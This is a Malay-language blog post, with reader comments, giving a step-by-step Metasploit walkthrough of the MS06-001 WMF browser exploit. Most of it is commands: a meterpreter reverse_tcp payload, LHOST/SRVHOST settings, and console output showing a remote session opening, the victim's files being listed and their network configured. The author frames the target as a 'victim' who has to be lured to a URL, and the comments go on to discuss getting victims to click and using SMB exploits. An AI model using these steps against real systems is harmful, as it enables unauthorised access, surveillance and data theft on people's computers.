Metasploit?

Korang pernah tak teringin nak guna metasploit?
Korang penah tak dapat buat satu session menggunakan metasploit?
Aku tak pernah dapat gune metasploit ni.. 🙁

Tapi aku tak pernah mengalah(kecuali perkara2 tertentu)..
Akhirnya aku dapat jugak guna..
Dan dapat jugak access ke PC tu.. 🙂

So, meh aku kongsikan macam mana aku dapat buat benda ni..
Pertama, korang install dulu Metasploit.
Tak kesahlah versi apa2 pun.
Nanti boleh update.

Lepas dah install, jangan lupa untuk update.
Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.

Lepas dan install & update,
korang run kan Metasploit.
Run yang console punya tau.
Sebab orang selalu cakap,
yang pakai CLI ni lagi efektif.
So, korang patut cuba.. 😉

Lepas dah run,
korang taipkan macam ni..

use windows/browser/ms06_001_wmf_setabortproc

Itu adalah exploit yang kita akan gunakan..
Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..

Lepas dah setkan exploit korang,
setkan pulak payload korang..

set payload windows/meterpreter/reverse_tcp

Lepas dah setkan payload tu,
korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Lepas dah setkan suma,
taipkan show options untuk tengok balik semua setting2 korang tu..
Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..

Lepas dah setel semua,
korang taipkan exploit..
Dia akan keluar lebih kurang macam ni..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu..
Barulah menjadi..
Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p

Lepas korang dah bagi mangsa korang bukak URL tu,
korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..

Kalo exploit korang menjadi,
dia akan keluar lebih kurang macam ni..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Dah kena! Korang dah ada 1 session ngan dia..
Bole la korang upload/download dan macam2 lagi kat PC dia..
Meh kita tengok..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:Documents and Settingszer0Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yeay! Saya dah berjaya. Haha..
Benda simple je kot..
Saya rasa orang lain tak pandang pun kalo saya dapat buat macam ni.. 🙁

Anyway, selamat mencuba la ye.
Ada pape, bole tanya saya.. 🙂

12 thoughts on “Metasploit?

  1. z e r 0

    metasploit ni kalo x salah aku la kn,
    die merupa kn penetration testing tools..
    atau dlm erti kata lain, software yg org guna kn utk cuba menggodam pc/system tu..

    Reply
  2. Hatearts

    korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain

    bila masuk pasrt tuh x paham la..
    LHOST, LPORT, SRVHOST tuh ape benda pulak

    Reply
  3. z e r 0

    ouh..
    itu ko kene bubuh ip add ko & mangse ko..
    & juga port ko..
    biase nye kat bahagian LHOST, RHOST, SRVHOST je kene bubuh ip..
    yg port plk x payah..
    biar kn default je..

    Reply
  4. Hatearts

    oo…kalu mcm tuh susah jugak nk suruh magsa klik link kita bagi tuh..lain la kalu mangsa secara rawak

    Reply
  5. z e r 0

    itu la psl..
    tp kalo ko ade mangse yg pakai Windows XP,
    ade kemungkinan ko bole attack die ikot smb pny exploit..

    Reply
  6. sam

    bro u tau x can na nak remove metasploit nie dari org yang dah terkena..saya terkena virus nie.facebook.yahoo mail.blog.hotmail.myspace diubah pasword nya..yg paling menyedih kan document saya dibocorkan dan diupload kat facebook.blog saya pula penuh dengan gambar2 lucah.saya sgt berharap tuan rumah dpt membantu saya..untuk pengetahuan saya telah menguna kan anti malaware.comodo.kapersky internet 2011.avira 2011.combofix.anti-hacker.tapi semua nie xberhasil..saya nak format komputer saya tapi document2 penting saya masih kat dlm locel c.document 2 saya xdpt pindah kat mana2…

    Reply
  7. zer0

    mcm mane ko tau tu punce nye dr metasploit?
    in my opinion, maybe ko kene RAT or keylogger kot..

    Reply
  8. zer0

    maybe ko bole refer kat forum2 yg expert psl bnd2 ni..
    x silap aku ko kene bg scan log dr hijackthis pny software..
    tp kalo ko rajin, ko bole cari bnd tu dgn mengguna kn Process Hacker..

    Reply

Any Comments?